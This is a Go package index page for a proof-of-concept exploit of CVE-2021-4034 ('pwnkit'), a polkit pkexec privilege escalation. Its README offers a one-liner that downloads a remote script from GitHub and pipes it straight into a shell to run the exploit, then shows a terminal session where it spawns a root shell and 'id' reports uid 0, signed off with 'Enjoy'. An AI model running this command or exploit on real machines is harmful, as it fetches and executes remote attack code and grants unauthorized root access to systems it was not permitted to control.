poc-cve-2021-4034

command module
v0.0.0-...-caad88f Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Jan 27, 2022 License: MIT Imports: 7 Imported by: 0

README

poc-cve-2021-4034

PoC for CVE-2021-4034 dubbed pwnkit

Release

How to use

just run make make then check release folder or if you prefer the one liner

sh -c "$(curl -sSL https://github.com/dzonerzy/poc-cve-2021-4034/releases/download/v0.2/run-exploit.sh)"

Enjoy

dzonerzy@DESKTOP-5JHC90H:/mnt/c/Users/DZONERZY/GolangProjects/pkpwn$ ./exploit
Spawning root shell!
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev),1000(dzonerzy)

Documentation

The Go Gopher

There is no documentation for this package.

Directories

Path Synopsis

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL